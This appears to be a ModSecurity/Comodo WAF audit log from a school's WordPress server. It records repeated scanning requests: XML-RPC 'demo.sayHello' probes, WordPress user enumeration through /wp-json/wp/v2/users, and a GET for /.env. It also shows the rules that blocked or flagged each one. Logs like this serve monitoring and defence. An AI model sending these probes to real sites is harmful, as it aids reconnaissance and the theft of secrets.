Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --356f6b71-Z-- --a500da28-A-- [08/May/2025:16:15:30 +0700] aBx2Mis5rYyn3jlLjjIBcQAAAMQ 103.236.140.4 34106 103.236.140.4 8181 --a500da28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.127 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a500da28-C-- demo.sayHello --a500da28-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a500da28-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746695730519526 5634 (- - -) Stopwatch2: 1746695730519526 5634; combined=4022, p1=525, p2=3287, p3=33, p4=32, p5=85, sr=67, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a500da28-Z-- --7c482466-A-- [08/May/2025:16:17:42 +0700] aBx2to4K347NtBcwXKxOyQAAAJY 103.236.140.4 39384 103.236.140.4 8181 --7c482466-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7c482466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c482466-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746695862083397 2543 (- - -) Stopwatch2: 1746695862083397 2543; combined=1164, p1=394, p2=739, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c482466-Z-- --50f7600d-A-- [08/May/2025:16:17:47 +0700] aBx2u6cs1DvJ_HgMHE9JGwAAAAs 103.236.140.4 39588 103.236.140.4 8181 --50f7600d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.142 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --50f7600d-C-- demo.sayHello --50f7600d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --50f7600d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746695867160832 5949 (- - -) Stopwatch2: 1746695867160832 5949; combined=4384, p1=562, p2=3535, p3=31, p4=96, p5=95, sr=72, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50f7600d-Z-- --b212fe16-A-- [08/May/2025:16:19:43 +0700] aBx3L44K347NtBcwXKxP_gAAAJE 103.236.140.4 44246 103.236.140.4 8181 --b212fe16-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b212fe16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b212fe16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746695983573803 3282 (- - -) Stopwatch2: 1746695983573803 3282; combined=1486, p1=496, p2=952, p3=0, p4=0, p5=37, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b212fe16-Z-- --a3196828-A-- [08/May/2025:16:19:48 +0700] aBx3NMP9GxxPAbCroFYXzgAAAFY 103.236.140.4 44438 103.236.140.4 8181 --a3196828-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a3196828-C-- demo.sayHello --a3196828-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3196828-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746695988223792 5571 (- - -) Stopwatch2: 1746695988223792 5571; combined=4147, p1=546, p2=3393, p3=30, p4=33, p5=87, sr=68, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3196828-Z-- --d4d03876-A-- [08/May/2025:16:20:49 +0700] aBx3cY4K347NtBcwXKxQogAAAIo 103.236.140.4 46882 103.236.140.4 8181 --d4d03876-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d4d03876-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4d03876-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746696049177965 2784 (- - -) Stopwatch2: 1746696049177965 2784; combined=1264, p1=428, p2=804, p3=0, p4=0, p5=32, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4d03876-Z-- --561bcb15-A-- [08/May/2025:16:20:58 +0700] aBx3eo4K347NtBcwXKxQqwAAAIM 103.236.140.4 47278 103.236.140.4 8181 --561bcb15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --561bcb15-C-- demo.sayHello --561bcb15-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --561bcb15-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746696058969121 5849 (- - -) Stopwatch2: 1746696058969121 5849; combined=4368, p1=570, p2=3571, p3=33, p4=35, p5=94, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --561bcb15-Z-- --d1714c0c-A-- [08/May/2025:16:56:09 +0700] aBx_ucP9GxxPAbCroFYhyQAAAEA 103.236.140.4 58914 103.236.140.4 8181 --d1714c0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d1714c0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1714c0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746698169278454 2275 (- - -) Stopwatch2: 1746698169278454 2275; combined=1227, p1=400, p2=794, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1714c0c-Z-- --f1670c77-A-- [08/May/2025:16:56:12 +0700] aBx_vKcs1DvJ_HgMHE9WnAAAAAA 103.236.140.4 58930 103.236.140.4 8181 --f1670c77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.14 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f1670c77-C-- demo.sayHello --f1670c77-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1670c77-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746698172561949 5545 (- - -) Stopwatch2: 1746698172561949 5545; combined=4058, p1=529, p2=3313, p3=24, p4=27, p5=98, sr=82, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1670c77-Z-- --13c4b446-A-- [08/May/2025:16:56:51 +0700] aBx_4ys5rYyn3jlLjjIPcgAAAMY 103.236.140.4 58946 103.236.140.4 8181 --13c4b446-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.38.88.126 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.38.88.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --13c4b446-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13c4b446-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746698211227206 740 (- - -) Stopwatch2: 1746698211227206 740; combined=293, p1=258, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13c4b446-Z-- --1299276c-A-- [08/May/2025:16:56:55 +0700] aBx_5ys5rYyn3jlLjjIPcwAAANc 103.236.140.4 58948 103.236.140.4 8181 --1299276c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1299276c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1299276c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746698215056467 1926 (- - -) Stopwatch2: 1746698215056467 1926; combined=809, p1=256, p2=534, p3=0, p4=0, p5=19, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1299276c-Z-- --5814ed0e-A-- [08/May/2025:16:57:00 +0700] aBx_7Cs5rYyn3jlLjjIPdQAAAMg 103.236.140.4 58952 103.236.140.4 8181 --5814ed0e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5814ed0e-C-- demo.sayHello --5814ed0e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5814ed0e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746698220167866 4576 (- - -) Stopwatch2: 1746698220167866 4576; combined=3601, p1=448, p2=2943, p3=26, p4=24, p5=93, sr=67, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5814ed0e-Z-- --328c9d68-A-- [08/May/2025:16:58:41 +0700] aByAUacs1DvJ_HgMHE9WngAAAAU 103.236.140.4 58976 103.236.140.4 8181 --328c9d68-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.211.143.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.211.143.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --328c9d68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --328c9d68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746698321422611 3524 (- - -) Stopwatch2: 1746698321422611 3524; combined=1514, p1=507, p2=968, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --328c9d68-Z-- --93d4ba06-A-- [08/May/2025:17:10:10 +0700] aByDAis5rYyn3jlLjjIPfAAAANY 103.236.140.4 59052 103.236.140.4 8181 --93d4ba06-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.67 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --93d4ba06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93d4ba06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746699010960504 2905 (- - -) Stopwatch2: 1746699010960504 2905; combined=1425, p1=474, p2=919, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93d4ba06-Z-- --fdeb8569-A-- [08/May/2025:17:10:13 +0700] aByDBSs5rYyn3jlLjjIPfQAAAMw 103.236.140.4 59056 103.236.140.4 8181 --fdeb8569-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.67 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fdeb8569-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdeb8569-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746699013326198 2143 (- - -) Stopwatch2: 1746699013326198 2143; combined=1049, p1=351, p2=669, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdeb8569-Z-- --8ccfe717-A-- [08/May/2025:17:10:15 +0700] aByDB8P9GxxPAbCroFYh5gAAAEE 103.236.140.4 59060 103.236.140.4 8181 --8ccfe717-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.67 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8ccfe717-C-- demo.sayHello --8ccfe717-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ccfe717-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746699015678350 17866 (- - -) Stopwatch2: 1746699015678350 17866; combined=29221, p1=474, p2=3470, p3=25, p4=25, p5=12627, sr=68, sw=63, l=0, gc=12537 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ccfe717-Z-- --f1b3946b-A-- [08/May/2025:17:10:29 +0700] aByDFacs1DvJ_HgMHE9WowAAABg 103.236.140.4 59064 103.236.140.4 8181 --f1b3946b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.67 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f1b3946b-C-- demo.sayHello --f1b3946b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1b3946b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746699029569779 5265 (- - -) Stopwatch2: 1746699029569779 5265; combined=4043, p1=501, p2=3320, p3=28, p4=31, p5=96, sr=75, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 